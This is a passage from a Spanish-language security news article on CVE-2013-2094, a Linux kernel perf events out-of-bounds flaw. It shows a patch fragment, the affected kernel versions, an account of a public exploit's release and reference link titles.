+   u64 event_id = event->attr.config;

    if (event->attr.type != PERF_TYPE_SOFTWARE)
        return -ENOENT;

El fallo fue reportado en abril, y pasó un poco de puntillas por la lista de desarrolladores, sin levantar demasiado revuelo. Pero parece que no pasó tan desapercibido para todo el mundo. Un poco más tarde, en mayo, un tercero hizo público un exploit para aprovechar la vulnerabilidad. Este hecho es el que realmente ha sacado a la luz que el fallo, es en realidad un grave problema de seguridad.

El CVE asignado es el CVE-2013-2094. Afectaría a todos los kernels (de 64 bits) desde la versión 2.6.37 a la 3.8.8 que hayan sido compilados con la opción CONFIG_PERF_EVENTS.

Más información:

Trinity

Linux kernel oops

Performance counter subsystem

CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access

Commit del parche en el repositorio del kernel Linux

Exploit



David García